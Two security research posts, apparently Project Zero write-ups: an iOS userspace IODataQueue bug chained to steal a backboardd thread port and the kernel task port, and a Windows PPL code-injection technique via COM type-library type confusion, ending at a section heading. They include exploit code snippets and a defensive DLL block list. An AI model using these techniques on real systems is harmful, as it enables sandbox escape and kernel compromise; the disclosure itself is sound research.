This summer while looking for variants of the old IODataQueue issues I saw something I hadn't noticed before: as well as the facilities for enqueuing and dequeuing objects to and from kernel-owned IODataQueues, the userspace IOKit.framework also contains code for creating userspace-owned queues, for use only between userspace processes.
The code for creating these queues isn't in the open-source IOKitUser package; you can only see this functionality by reversing the IOKit framework binary.
There are no users of this code in the IOKitUser source, but some reversing showed that the userspace-only queues were used by the com.apple.iohideventsystem MIG service, implemented in IOKit.framework and hosted by backboardd on iOS and hidd on MacOS. You can talk to this service from inside the app sandbox on iOS.
Reading the userspace __IODataQueueEnqueue method, which is used to enqueue objects into both userspace and kernel queues, I had a strong feeling of deja-xnu: It was trusting the queueSize value in the queue header in shared memory, just like CVE-2014-4418 from 2014 did. Of course, if the kernel is the other end of the queue then this isn't interesting (since the kernel doesn't trust these values) but we now know that there are userspace only queues, where the other end is another userspace process.
Reading more of the userspace IODataQueue handling code I noticed that unlike the kernel IODataQueue object, the userspace one had an appendix as well as a header. And in that appendix, like IOSharedDataQueue, it stored a mach message header! Did this userspace IODataQueue have the same issue as the IOSharedDataQueue issue from Pangu 7/8? Let's look at the code:
IOReturn IODataQueueSetNotificationPort(IODataQueueMemory *dataQueue, mach_port_t notifyPort)
{
    IODataQueueAppendix * appendix  = NULL;
    UInt32                queueSize = 0;

    if ( !dataQueue )
        return kIOReturnBadArgument;

    queueSize = dataQueue->queueSize;

    appendix = (IODataQueueAppendix *)((UInt8 *)dataQueue + queueSize +
                                       DATA_QUEUE_MEMORY_HEADER_SIZE);

    appendix->msgh.msgh_bits        = MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND, 0);
    appendix->msgh.msgh_size        = sizeof(appendix->msgh);
    appendix->msgh.msgh_remote_port = notifyPort;
    appendix->msgh.msgh_local_port  = MACH_PORT_NULL;
    appendix->msgh.msgh_id          = 0;

    return kIOReturnSuccess;
}
We can take a look in lldb at the contents of the buffer and see that at the end of the queue, still in shared memory, we can see a mach message header, where the name field is the remote end's name for the notification port we provided!
Exploitation of an arbitrary mach message send

In XNU each task (process) has a task port, and each thread within a task has a thread port. Originally a send right to a task's task port gave full memory and thread control, and a send right to a thread port meant full thread control (which is of course also full memory control.)
As a result of the exploits which I and others have released abusing issues with mach ports to steal port rights, Apple have very slowly been hardening these interfaces. But as of iOS 11.4.1, if you have a send right to a thread port belonging to another task you can still use it to manipulate the register state of that thread.
Interestingly process startup on iOS is sufficiently deterministic that in backboardd on iOS 7.1.2 on an iPhone 4 right up to iOS 11.4.1 on an iPhone SE, 0x407 names a thread port.
Stealing ports

The msgh_local_port field in a mach message is typically used to give the recipient of a message a send-once right to a "reply port" which can be used to send a reply. This is just a convention and any send or send-once right can be transferred here. So by rewriting the mach message in shared memory which will be sent to us to set the msgh_local_port field to 0x407 (backboardd's name for a thread port) and the msgh_bits field to use a COPY_SEND disposition for the local port, when the notification message is sent to us by backboardd we'll receive a send right to a backboardd thread port!
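In code the rewrite is tiny; a sketch (notify_msg is a hypothetical pointer to the header found at the end of the shared queue memory, and 0x407 the observed thread port name):

// Rewrite the notification message so that, when backboardd next sends it,
// the kernel interprets msgh_local_port in *backboardd's* namespace and we
// receive a send right to its thread port.
notify_msg->msgh_bits = MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND,  // remote port
                                       MACH_MSG_TYPE_COPY_SEND); // local port
notify_msg->msgh_local_port = 0x407;  // backboardd's name for a thread port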
The exploit for this issue targets iOS 11.4.1, and contains a modified version of the remote_call code from triple_fetch to work with a stolen thread port rather than a task port.
Back to 2014

I mentioned that Apple have slowly been adding mitigations against the use of stolen task ports. The first of these mitigations I'm aware of was to prevent userspace using the kernel task port, often known as task-for-pid-0 or TFP0, which is the task port representing the kernel task (and hence allowing read/write access to kernel memory). I believe this was done in response to my mach_portal exploit which used a kernel use-after-free to steal a send right to the kernel task port.
Prior to that hardening, if you had a send right to the kernel task port you had complete read/write access to kernel memory.
We've seen that port name allocation is extremely stable, with the same name for a thread port for four years. Is the situation similar for the ipc_port pointers used in the kernel in mach messages?
Very early kernel port allocation is also deterministic. I abused this in mach_portal to steal the kernel task port by first determining the address of the host port then guessing that the kernel task port must be nearby since they're both very early port allocations.
Back in 2014 things were even easier because the kernel task port was at a fixed offset from the host port; all we need to do is leak the address of the host port then we can compute the address of the kernel task port!
Determining port addresses

IOHIDEventService is a userclient which exposes an IOSharedDataQueue to userspace. We can't open this from inside the app sandbox, but the exploit for the userspace IODataQueue bug was easy enough to backport to 32-bit iOS 7.1.2, and we can open an IOHIDEventService userclient from backboardd.
The sandbox only prevents us from actually opening the userclient connection. We can then transfer the mach port representing this connection back to our sandboxed app and continue the exploit from there. Using the code I wrote for triple_fetch we can easily use backboardd's task port which we stole (using the userspace IODataQueue bug) to open an IOKit userclient connection and move it back:
uint32_t remote_matching =
  task_remote_call(bbd_task_port,
                   IOServiceMatching,
                   1,
                   REMOTE_CSTRING("IOHIDEventService"));

uint32_t remote_service =
  task_remote_call(bbd_task_port,
                   IOServiceGetMatchingService,
                   2,
                   REMOTE_LITERAL(0),
                   REMOTE_LITERAL(remote_matching));

uint32_t remote_conn = 0;
uint32_t remote_err =
  task_remote_call(bbd_task_port,
                   IOServiceOpen,
                   4,
                   REMOTE_LITERAL(remote_service),
                   REMOTE_LITERAL(0x1307), // remote mach_task_self()
                   REMOTE_LITERAL(0),
                   REMOTE_OUT_BUFFER(&remote_conn,
                                     sizeof(remote_conn)));

mach_port_t conn =
  pull_remote_port(bbd_task_port,
                   remote_conn,
                   MACH_MSG_TYPE_COPY_SEND);
We then just need to call external method 0 to "open" the queue and IOConnectMapMemory to map the queue shared memory into our process and find the mach message header:
vm_address_t qaddr = 0;
vm_size_t qsize = 0;

IOConnectMapMemory(conn,
                   0,
                   mach_task_self(),
                   &qaddr,
                   &qsize,
                   1);

mach_msg_header_t* shm_msg =
  (mach_msg_header_t*)(qaddr + qsize - 0x18);
In order to set the queue's notification port we need to call IOConnectSetNotificationPort on the userclient:
mach_port_t notification_port = MACH_PORT_NULL;
mach_port_allocate(mach_task_self(),
                   MACH_PORT_RIGHT_RECEIVE,
                   &notification_port);

uint64_t ref[8] = {0};
IOConnectSetNotificationPort(conn,
                             0,
                             notification_port,
                             ref);
We can then see the kernel address of that port's ipc_port in the shared memory message:
+0x00001010 00000013  // msgh_bits
+0x00001014 00000018  // msgh_size
+0x00001018 99a3e310  // msgh_remote_port
+0x0000101c 00000000  // msgh_local_port
+0x00001020 00000000  // msgh_reserved
+0x00001024 00000000  // msgh_id

We now need to determine the heap address of an early kernel port. If we just call IOConnectSetNotificationPort with a send right to the host_self port, we get an error:
IOConnectSetNotificationPort error: 1000000a (ipc/send) invalid port right
This error is actually from the MIG client code telling us that the MIG serialized message failed to send. IOConnectSetNotificationPort is a thin wrapper around the MIG generated io_connect_set_notification_port client code. Let's take a look in device.defs, which is the source file used by MIG to generate the RPC stubs for IOKit:
routine io_connect_set_notification_port(
    connection        : io_connect_t;
 in notification_type : uint32_t;
 in port              : mach_port_make_send_t;
 in reference         : uint32_t);
Here we can see that the port argument is defined as a mach_port_make_send_t, which means that the MIG code will send the port argument in a port descriptor with a disposition of MACH_MSG_TYPE_MAKE_SEND, which requires the sender to hold a receive right. But in mach the receiver has no way to determine whether the sender actually held a receive right and created a new send right (MAKE_SEND), or instead just sent a copy of an existing send right via MACH_MSG_TYPE_COPY_SEND. This means that all we need to do is modify the MIG client code to use a COPY_SEND disposition and then we can set the queue's notification port to any send right we can acquire, irrespective of whether we hold a receive right.
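A hand-rolled version of that modified call might look like the following. This is a sketch modelled on typical MIG-generated code, not copied from the SDK: the message layout is an assumption and the msgh_id is a placeholder which would need to be taken from the real generated header.

#include <mach/mach.h>
#include <mach/mig.h>
#include <mach/ndr.h>

#pragma pack(4)
typedef struct {
  mach_msg_header_t Head;
  mach_msg_body_t msgh_body;
  mach_msg_port_descriptor_t port;
  NDR_record_t NDR;
  uint32_t notification_type;
  uint32_t reference;
  mach_msg_trailer_t trailer;  // space for the receive-side trailer
} SetNotificationPortMsg;
#pragma pack()

#define IO_CONNECT_SET_NOTIFICATION_PORT_ID 0 /* placeholder msgh_id */

kern_return_t
set_notification_port_copy_send(mach_port_t connection,
                                uint32_t notification_type,
                                mach_port_t port,
                                uint32_t reference) {
  SetNotificationPortMsg msg = {0};
  msg.Head.msgh_bits = MACH_MSGH_BITS_COMPLEX |
      MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND, MACH_MSG_TYPE_MAKE_SEND_ONCE);
  msg.Head.msgh_remote_port = connection;
  msg.Head.msgh_local_port = mig_get_reply_port();
  msg.Head.msgh_id = IO_CONNECT_SET_NOTIFICATION_PORT_ID;
  msg.Head.msgh_size = sizeof(msg) - sizeof(msg.trailer);
  msg.msgh_body.msgh_descriptor_count = 1;
  msg.port.name = port;
  // The one change that matters: COPY_SEND instead of the generated
  // MAKE_SEND, letting us pass any send right we can acquire.
  msg.port.disposition = MACH_MSG_TYPE_COPY_SEND;
  msg.port.type = MACH_MSG_PORT_DESCRIPTOR;
  msg.NDR = NDR_record;
  msg.notification_type = notification_type;
  msg.reference = reference;

  // Send the request and wait for the MIG reply (reply parsing omitted).
  return mach_msg(&msg.Head, MACH_SEND_MSG | MACH_RCV_MSG,
                  msg.Head.msgh_size, sizeof(msg),
                  msg.Head.msgh_local_port,
                  MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);
}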
Doing this and passing the name we get from mach_host_self() we can learn the host port's kernel address:
host port: 0x8e30cee0
Leaking a couple of early ports which are likely to come from the same memory page and finding the greatest common factor gives us a good guess for the size of an ipc_port_t in this version of iOS:
master port: 0x8e30c690
host port: 0x8e30cee0
GCF(0x690, 0xee0) = 0x70
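The same arithmetic as a tiny standalone program, taking the greatest common divisor of the two page offsets:

#include <stdint.h>
#include <stdio.h>

// Estimate sizeof(ipc_port) from two leaked early-port kernel addresses
// that likely come from the same zone page.
static uint32_t gcd(uint32_t a, uint32_t b) {
  while (b != 0) {
    uint32_t t = a % b;
    a = b;
    b = t;
  }
  return a;
}

int main(void) {
  uint32_t master_port = 0x8e30c690;  // leaked via the notification trick
  uint32_t host_port   = 0x8e30cee0;
  uint32_t guess = gcd(master_port & 0xfff, host_port & 0xfff);
  printf("likely sizeof(ipc_port): 0x%x\n", guess);  // prints 0x70
  return 0;
}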
Looking at the XNU source we can see that the host port is allocated before the kernel task port, and since this was before the zone allocator freelist randomisation mitigation was introduced this means that the address of the kernel task port will be somewhere below the host port.
By setting the msgh_local_port field to the address of the host port minus 0x70, then decrementing it by a further 0x70 each time we receive a notification message, we will be sent a different early port with each notification. Doing this we learn that the kernel task port is allocated 5 ports after the host port, meaning that the address of the kernel task port is host_port_kaddr - (5*0x70).
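In outline, the scan looks something like this; the helpers are hypothetical stand-ins for the shared-memory machinery described above:

#include <mach/mach.h>
#include <stdint.h>

// Hypothetical helpers standing in for machinery described in the text.
extern void write_shm_reply_port_kaddr(uint32_t kaddr);  // rewrite shared memory
extern void trigger_hid_notification(void);              // e.g. press home button
extern mach_port_t receive_notification(void);           // returns received right
extern int looks_like_kernel_task_port(mach_port_t p);   // e.g. try pid_for_task

// Downward scan from the host port: each iteration makes the kernel
// interpret host_port_kaddr - i*0x70 as the reply port's ipc_port
// pointer and sends us a right to whatever lives there.
mach_port_t scan_for_kernel_task_port(uint32_t host_port_kaddr) {
  for (uint32_t i = 1; i <= 16; i++) {
    write_shm_reply_port_kaddr(host_port_kaddr - i * 0x70);
    trigger_hid_notification();
    mach_port_t received = receive_notification();
    if (looks_like_kernel_task_port(received))
      return received;  // on this build it turns up at i == 5
  }
  return MACH_PORT_NULL;
}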
Putting it all together

You can get my exploit for iOS 7.1.2 here; I've only tested it on an iPhone 4. You'll need to use an old version of Xcode to build and run it; I'm using Xcode 7.3.1.
Launch the app, press the home button to trigger an HID notification message and enjoy read/write access to kernel memory. :)
In 2014, then, it seems that with enough OS internals knowledge and the right set of bugs it was pretty easy to build a logic bug chain to get kernel memory read/write. Things have certainly changed since then, but I'd be interested to compare this post with another one in 2022 looking back to 2018.
Lessons

Variant analysis is really important, but attackers are the only parties incentivized to do a good job of it. Why did the userspace variant of this IODataQueue issue persist for four more years after almost the exact same bug was fixed in the kernel code?
Let's also not underplay the impact that just the userspace version of the bug alone could have had. Prior to mach_portal, due to a design quirk of the com.apple.iohideventsystem MIG service, backboardd had send rights to a large number of other processes' task ports, meaning that a compromise of backboardd was also a compromise of those tasks.
Some of those tasks ran as root meaning they could have exploited the processor_set_tasks vulnerability to get the task ports for any task on the device, which despite being a known issue also wasn't fixed until I exploited it in triple_fetch.
This IODataQueue issue wasn't the only variant I found as part of this project; the deja-xnu project for iOS 11.4.1 also contains PoC code to trigger a MIG code generation bug in clients of backboardd, and the Project Zero tracker has details of further issues.
A final note on security bulletins

You'll notice that none of the issues I've linked above are mentioned in the iOS 12 security bulletin, despite being fixed in that release. Apple have yet to assign CVEs for these issues or publicly acknowledge that they were fixed in iOS 12. In my opinion a security bulletin should mention the security bugs that were fixed. Not doing so provides a disincentive for people to update their devices, since it appears that there were fewer security fixes than there really were.

Injecting Code into Windows Protected Processes using COM - Part 1

Tue, 10/16/2018 - 12:34
Posted by James Forshaw, Google Project Zero
At Recon Montreal 2018 I presented “Unknown Known DLLs and other Code Integrity Trust Violations” with Alex Ionescu. We described the implementation of Microsoft Windows’ Code Integrity mechanisms and how Microsoft implemented Protected Processes (PP). As part of that I demonstrated various ways of bypassing Protected Process Light (PPL), some requiring administrator privileges, others not.
In this blog I’m going to describe the process I went through to discover a way of injecting code into a PPL on Windows 10 1803. As the only issue Microsoft considered to be violating a defended security boundary has now been fixed I can discuss the exploit in more detail.

Background on Windows Protected Processes

The origins of the Windows Protected Process (PP) model stretch back to Vista where it was introduced to protect DRM processes. The protected process model was heavily restricted, limiting loaded DLLs to a subset of code installed with the operating system. Also, for an executable to be considered eligible to be started protected it must be signed with a specific Microsoft certificate which is embedded in the binary. One protection the kernel enforces is that a non-protected process can’t open a handle to a protected process with enough rights to inject arbitrary code or read memory.
In Windows 8.1 a new mechanism was introduced, Protected Process Light (PPL), which made the protection more generalized. PPL loosened some of the restrictions on what DLLs were considered valid for loading into a protected process and introduced different signing requirements for the main executable. Another big change was the introduction of a set of signing levels to separate out different types of protected processes. A PPL in one level can open for full access any process at the same signing level or below, with a restricted set of access granted to levels above. These signing levels were extended to the old PP model: a PP at one level can open all PP and PPL at the same signing level or below for full access, but the reverse is not true; a PPL can never open a PP at any signing level for full access. Some of the levels and this relationship are shown below:
Signing levels allow Microsoft to open up protected processes to third-parties, although at the current time the only type of protected process that a third party can create is an Anti-Malware PPL. The Anti-Malware level is special as it allows the third party to add additional permitted signing keys by registering an Early Launch Anti-Malware (ELAM) certificate. There is also Microsoft’s TruePlay, an Anti-Cheat technology for games which uses components of PPL, but it isn’t really important for this discussion.
I could spend a lot of this blog post describing how PP and PPL work under the hood, but I recommend reading the blog post series by Alex Ionescu instead (Parts 1, 2 and 3) which will do a better job. While the blog posts are primarily based on Windows 8.1, most of the concepts haven’t changed substantially in Windows 10.
I’ve written about Protected Processes before [link], in the form of the custom implementation by Oracle in their VirtualBox virtualization platform on Windows. The blog showed how I bypassed the process protection using multiple different techniques. What I didn’t mention at the time was that the first technique I described, injecting JScript code into the process, also worked against Microsoft's PPL implementation. I reported to Microsoft that I could inject arbitrary code into a PPL (see Issue 1336) from an abundance of caution in case Microsoft wanted to fix it. In this case Microsoft decided it wouldn’t be fixed in a security bulletin. However, Microsoft did fix the issue in the next major release of Windows (version 1803) by adding the following code to CI.DLL, the kernel’s Code Integrity library:
UNICODE_STRING g_BlockedDllsForPPL[] = {
 DECLARE_USTR("scrobj.dll"),
 DECLARE_USTR("scrrun.dll"),
 DECLARE_USTR("jscript.dll"),
 DECLARE_USTR("jscript9.dll"),
 DECLARE_USTR("vbscript.dll")
};

NTSTATUS CipMitigatePPLBypassThroughInterpreters(PEPROCESS Process,
                                                LPBYTE Image,
                                                SIZE_T ImageSize) {
 if (!PsIsProtectedProcess(Process))
   return STATUS_SUCCESS;

 UNICODE_STRING OriginalImageName;
 // Get the original filename from the image resources.
 SIPolicyGetOriginalFilenameAndVersionFromImageBase(
     Image, ImageSize, &OriginalImageName);
 for(int i = 0; i < _countof(g_BlockedDllsForPPL); ++i) {
   if (RtlEqualUnicodeString(g_BlockedDllsForPPL[i],
                             &OriginalImageName, TRUE)) {
     return STATUS_DYNAMIC_CODE_BLOCKED;
   }
 }
 return STATUS_SUCCESS;
}
The fix checks the original file name in the resource section of the image being loaded against a blacklist of 5 DLLs. The blacklist includes DLLs such as JSCRIPT.DLL, which implements the original JScript scripting engine, and SCROBJ.DLL, which implements scriptlet objects. If the kernel detects a PP or PPL loading one of these DLLs the image load is rejected with STATUS_DYNAMIC_CODE_BLOCKED. This kills my exploit: if you modify the resource section of one of the listed DLLs the signature of the image will be invalidated, resulting in the image load failing due to a cryptographic hash mismatch. It’s actually the same fix that Oracle used to block the attack in VirtualBox, although that was implemented in user-mode.

Finding New Targets

The previous injection technique using script code was a generic technique that worked on any PPL which loaded a COM object. With the technique fixed I decided to go back and look at what executables will load as a PPL to see if they have any obvious vulnerabilities I could exploit to get arbitrary code execution. I could have chosen to go after a full PP, but PPL seemed the easier of the two and I’ve got to start somewhere. There are so many ways to inject into a PPL if we could just get administrator privileges, the least of which is just loading a kernel driver. For that reason any vulnerability I discover must work from a normal user account. Also, I wanted to get the highest signing level I could, which means PPL at Windows TCB signing level.
The first step was to identify executables which run as a protected process, this gives us the maximum attack surface to analyze for vulnerabilities. Based on the blog posts from Alex it seemed that in order to be loaded as PP or PPL the signing certificate needs a special Object Identifier (OID) in the certificate’s Enhanced Key Usage (EKU) extension. There are separate OIDs for PP and PPL; we can see this below with a comparison between WERFAULTSECURE.EXE, which can run as PP/PPL, and CSRSS.EXE, which can only run as PPL.

I decided to look for executables which have an embedded signature with these EKU OIDs, which would give me a list of all executables to inspect for exploitable behavior. I wrote the Get-EmbeddedAuthenticodeSignature cmdlet for my NtObjectManager PowerShell module to extract this information.
At this point I realized there was a problem with the approach of relying on the signing certificate: a lot of binaries I expected to be allowed to run as PP or PPL were missing from the list I generated. As PP was originally designed for DRM, I expected to find an executable handling the Protected Media Path, such as AUDIODG.EXE, but there was no obvious candidate. Also, based on my previous research into Device Guard and Windows 10S, I knew there must be an executable in the .NET framework which could run as PPL to add cached signing level information to NGEN generated binaries (NGEN is an Ahead-of-Time JIT to convert a .NET assembly into native code). The criteria for PP/PPL were more fluid than I expected. Instead of doing static analysis I decided to perform dynamic analysis: just start every executable I could enumerate as protected and query the protection level granted. I wrote the following script to test a single executable:
Import-Module NtObjectManager
function Test-ProtectedProcess {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory, ValueFromPipelineByPropertyName)]
        [string]$FullName,
        [NtApiDotNet.PsProtectedType]$ProtectedType = 0,
        [NtApiDotNet.PsProtectedSigner]$ProtectedSigner = 0
        )
    BEGIN {
        $config = New-NtProcessConfig abc -ProcessFlags ProtectedProcess `
            -ThreadFlags Suspended -TerminateOnDispose `
            -ProtectedType $ProtectedType `
            -ProtectedSigner $ProtectedSigner
    }

    PROCESS {
        $path = Get-NtFilePath $FullName
        Write-Host $path
        try {
            Use-NtObject($p = New-NtProcess $path -Config $config) {
                $prot = $p.Process.Protection
                $props = @{
                    Path=$path;
                    Type=$prot.Type;
                    Signer=$prot.Signer;
                    Level=$prot.Level.ToString("X");
                }
                $obj = New-Object -TypeName PSObject -Prop $props
                Write-Output $obj
            }
        } catch {
        }
    }
}
When this script is executed a function is defined, Test-ProtectedProcess. The function takes a path to an executable, starts that executable with a specified protection level and checks whether it was successful. If the ProtectedType and ProtectedSigner parameters are 0 then the kernel decides the “best” process level. This leads to some annoying quirks: for example, SVCHOST.EXE is explicitly marked as PPL and will run at PPL-Windows level, however as it’s also a signed OS component the kernel will determine its maximum level is PP-Authenticode. Another interesting quirk is that using the native process creation APIs it’s possible to start a DLL as the main executable image. As a significant number of system DLLs have embedded Microsoft signatures they can also be started as PP-Authenticode, even though this isn’t necessarily that useful. The list of binaries that will run at PPL is shown below along with their maximum signing level.
Path                                                           Signing Level
C:\windows\Microsoft.Net\Framework\v4.0.30319\mscorsvw.exe     CodeGen
C:\windows\Microsoft.Net\Framework64\v4.0.30319\mscorsvw.exe   CodeGen
C:\windows\system32\SecurityHealthService.exe                  Windows
C:\windows\system32\svchost.exe                                Windows
C:\windows\system32\xbgmsvc.exe                                Windows
C:\windows\system32\csrss.exe                                  Windows TCB
C:\windows\system32\services.exe                               Windows TCB
C:\windows\system32\smss.exe                                   Windows TCB
C:\windows\system32\werfaultsecure.exe                         Windows TCB
C:\windows\system32\wininit.exe                                Windows TCB

Injecting Arbitrary Code Into NGEN

After carefully reviewing the list of executables which run as PPL I settled on trying to attack the previously mentioned .NET NGEN binary, MSCORSVW.EXE. My rationale for choosing the NGEN binary was:
  • Most of the other binaries are service binaries which might need administrator privileges to start correctly.
  • The binary is likely to be loading complex functionality such as the .NET framework as well as having multiple COM interactions (my go-to technology for weird behavior).
  • In the worst case it might still yield a Device Guard bypass as the reason it runs as PPL is to give it access to the kernel APIs to apply a cached signing level. Any bug in the operation of this binary might be exploitable even if we can’t get arbitrary code running in a PPL.

But there is an issue with the NGEN binary: it doesn’t meet my own criterion of getting the top signing level, Windows TCB. However, I knew that when Microsoft fixed Issue 1332 they left in a back door where a writable handle could be maintained during the signing process if the calling process is PPL, as shown below:
NTSTATUS CiSetFileCache(HANDLE Handle, ...) {

 PFILE_OBJECT FileObject;
 ObReferenceObjectByHandle(Handle, &FileObject);

 if (FileObject->SharedWrite ||
    (FileObject->WriteAccess &&
     PsGetProcessProtection().Type != PROTECTED_LIGHT)) {
   return STATUS_SHARING_VIOLATION;
 }

 // Continue setting file cache.
}
If I could get code execution inside the NGEN binary I could reuse this backdoor to cache sign an arbitrary file which will load into any PPL. I could then DLL hijack a full PPL-WindowsTCB process to reach my goal.
To begin the investigation we need to determine how to use the MSCORSVW executable. Using MSCORSVW is not documented anywhere by Microsoft, so we’ll have to do a bit of digging. First off, this binary is not supposed to be run directly, instead it’s invoked by NGEN when creating an NGEN’ed binary. Therefore, we can run the NGEN binary and use a tool such as Process Monitor to capture what command line is being used for the MSCORSVW process. Executing the command:
C:\> NGEN install c:\some\binary.dll
Results in the following command line being executed:
MSCORSVW -StartupEvent A -InterruptEvent B -NGENProcess C -Pipe D
A, B, C and D are handles which NGEN ensures are inherited into the new process before it starts. As we don’t see any of the original NGEN command line parameters it seems likely they’re being passed over an IPC mechanism. The “Pipe” parameter gives an indication that named pipes are used for IPC. Digging into the code in MSCORSVW, we find the method NGenWorkerEmbedding, which looks like the following:
void NGenWorkerEmbedding(HANDLE hPipe) {
 CoInitializeEx(nullptr, COINIT_APARTMENTTHREADED);
 CorSvcBindToWorkerClassFactory factory;

 // Marshal class factory.
 IStream* pStm;
 CreateStreamOnHGlobal(nullptr, TRUE, &pStm);
 CoMarshalInterface(pStm, &IID_IClassFactory, &factory,
                    MSHCTX_LOCAL, nullptr, MSHLFLAGS_NORMAL);

 // Read marshaled object and write to pipe.
 DWORD length;
 char* buffer = ReadEntireIStream(pStm, &length);
 WriteFile(hPipe, &length, sizeof(length));
 WriteFile(hPipe, buffer, length);
 CloseHandle(hPipe);

 // Set event to synchronize with parent.
 SetEvent(hStartupEvent);

 // Pump message loop to handle COM calls.
 MessageLoop();

 // ...
}
This code is not quite what I expected. Rather than using the named pipe for the entire communication channel, it’s only used to transfer a marshaled COM object back to the calling process. The COM object is a class factory instance; normally you’d register the factory using CoRegisterClassObject, but that would make it accessible to all processes at the same security level, so by using marshaling instead the connection can be kept private to the NGEN binary which spawned MSCORSVW. A .NET related process using COM gets me interested as I’ve previously described in another blog post how you can exploit COM objects implemented in .NET. If we’re lucky this COM object is implemented in .NET; we can determine whether it is by querying for its interfaces, for example using the Get-ComInterface command in my OleViewDotNet PowerShell module as shown in the following screenshot.

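As an aside, the NGEN parent side of that handshake presumably just reverses the pipe operation: read the length-prefixed marshaled bytes back out and unmarshal the class factory. A rough sketch under that assumption; the function name and error handling are mine:

#include <windows.h>
#include <objbase.h>

// Hedged sketch of the receiving side: hPipe is the other end of the
// pipe handle D that NGEN inherited into MSCORSVW.
IClassFactory* ReadFactoryFromPipe(HANDLE hPipe) {
  DWORD length = 0, read = 0;
  ReadFile(hPipe, &length, sizeof(length), &read, nullptr);

  // Copy the marshaled object data into a memory-backed stream.
  IStream* pStm = nullptr;
  CreateStreamOnHGlobal(nullptr, TRUE, &pStm);
  BYTE* buffer = new BYTE[length];
  ReadFile(hPipe, buffer, length, &read, nullptr);
  ULONG written = 0;
  pStm->Write(buffer, length, &written);
  delete[] buffer;

  // Rewind and unmarshal the IClassFactory proxy.
  LARGE_INTEGER zero = {};
  pStm->Seek(zero, STREAM_SEEK_SET, nullptr);
  IClassFactory* pFactory = nullptr;
  CoUnmarshalInterface(pStm, IID_IClassFactory,
                       reinterpret_cast<void**>(&pFactory));
  pStm->Release();
  return pFactory;
}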
We’re out of luck: this object is not implemented in .NET, as we’d otherwise expect to see at least an instance of the _Object interface. Only one interface is implemented, ICorSvcBindToWorker, so let’s dig into that interface to see if there’s anything we can exploit.
Something caught my eye: in the screenshot there’s a HasTypeLib column, and for ICorSvcBindToWorker we see that the column is set to True. What HasTypeLib indicates is that rather than the interface’s proxy code being implemented using a predefined NDR byte stream, it’s generated on the fly from a type library. I’ve abused this auto-generating proxy mechanism before to elevate to SYSTEM, reported as issue 1112. In that issue I used some interesting behavior of the system’s Running Object Table (ROT) to force a type confusion in a system COM service. While Microsoft has fixed the issue for User to SYSTEM, there’s nothing stopping us using the type confusion trick to exploit the MSCORSVW process running as PPL at the same privilege level and get arbitrary code execution. Another advantage of using a type library is that a normal proxy would be loaded as a DLL, which means it must meet the PPL signing level requirements; a type library, however, is just data so it can be loaded into a PPL without any signing level violations.
How does the type confusion work? Looking at the ICorSvcBindToWorker interface from the type library:
interface ICorSvcBindToWorker : IUnknown {
   HRESULT BindToRuntimeWorker(
             [in] BSTR pRuntimeVersion,
             [in] unsigned long ParentProcessID,
             [in] BSTR pInterruptEventName,
             [in] ICorSvcLogger* pCorSvcLogger,
             [out] ICorSvcWorker** pCorSvcWorker);
};
The single method, BindToRuntimeWorker, takes 5 parameters: 4 are inbound and 1 is outbound. When trying to access the method over DCOM from our untrusted process the system will automatically generate the proxy and stub for the call. This will include marshaling COM interface parameters into a buffer, sending the buffer to the remote process and then unmarshaling to a pointer before calling the real function. For example, imagine a simpler function, DoSomething, which takes a single IUnknown pointer. The marshaling process looks like the following:
The operation of the method call is as follows:
  1. The untrusted process calls DoSomething on the interface which is actually a pointer to DoSomethingProxy which was auto-generated from the type library passing an IUnknown pointer parameter.
  2. DoSomethingProxy marshals the IUnknown pointer parameter into the buffer and calls over RPC to the Stub in the protected process.
  3. The COM runtime calls the DoSomethingStub method to handle the call. This method will unmarshal the interface pointer from the buffer. Note that this pointer is not the original pointer from step 1, it’s likely to be a new proxy which calls back to the untrusted process.
  4. The stub invokes the real implemented method inside the server, passing the unmarshaled interface pointer.
  5. DoSomething uses the interface pointer, for example by calling AddRef on it via the object’s VTable.

How would we exploit this? All we need to do is modify the type library so that instead of passing an interface pointer we pass almost anything else. While the type library file is in a system location which we can’t modify, we can just replace the registration for it in the current user’s registry hive, or use the same ROT trick from issue 1112 mentioned before. For example, if we modify the type library to pass an integer instead of an interface pointer we get the following:
The operation of the marshal now changes as follows:
  1. The untrusted process calls DoSomething on the interface which is actually a pointer to DoSomethingProxy which was auto-generated from the type library passing an arbitrary integer parameter.
  2. DoSomethingProxy marshals the integer parameter into the buffer and calls over RPC to the Stub in the protected process.
  3. The COM runtime calls the DoSomethingStub method to handle the call. This method will unmarshal the integer from the buffer.
  4. The stub invokes the real implemented method inside the server, passing the integer as the parameter. However DoSomething hasn’t changed, it’s still the same method which accepts an interface pointer. As the COM runtime has no more type information at this point the integer is type confused with the interface pointer.
  5. DoSomething uses the interface pointer, for example by calling AddRef on it via the object’s VTable. As this pointer is completely under control of the untrusted process this likely results in arbitrary code execution.

By changing the type of parameter from an interface pointer to an integer we induce a type confusion which allows us to get an arbitrary pointer dereferenced, resulting in arbitrary code execution. We could even simplify the attack by adding to the type library the following structure:
struct FakeObject {
   BSTR FakeVTable;
};
If we pass a pointer to a FakeObject instead of the interface pointer the auto-generated proxy will marshal the structure and its BSTR, recreating it on the other side in the stub. As a BSTR is a counted string it can contain NULLs so this will create a pointer to an object, which contains a pointer to an arbitrary byte array which can act as a VTable. Place known function pointers in that BSTR and you can easily redirect execution without having to guess the location of a suitable VTable buffer.
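A rough sketch of how such a payload could be built; this is illustrative only, relying on the fact that SysAllocStringByteLen copies raw bytes, embedded NULs included:

#include <windows.h>
#include <oleauto.h>

struct FakeObject {
  BSTR FakeVTable;
};

// Build a FakeObject whose BSTR carries an arbitrary table of
// "function pointers" to act as a fake vtable after unmarshaling.
FakeObject MakeFakeObject(void** knownFuncs, size_t count) {
  FakeObject obj = {};
  // A BSTR is length-prefixed, so the NULs inside the pointer table
  // survive marshaling intact.
  obj.FakeVTable = SysAllocStringByteLen(
      reinterpret_cast<const char*>(knownFuncs),
      static_cast<UINT>(count * sizeof(void*)));
  return obj;
}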
To fully exploit this we’d need to call a suitable method, probably running a ROP chain, and we might also have to bypass CFG. That all sounds too much like hard work, so instead I’ll take a different approach to get arbitrary code running in the PPL binary, by abusing KnownDlls.

KnownDlls and Protected Processes

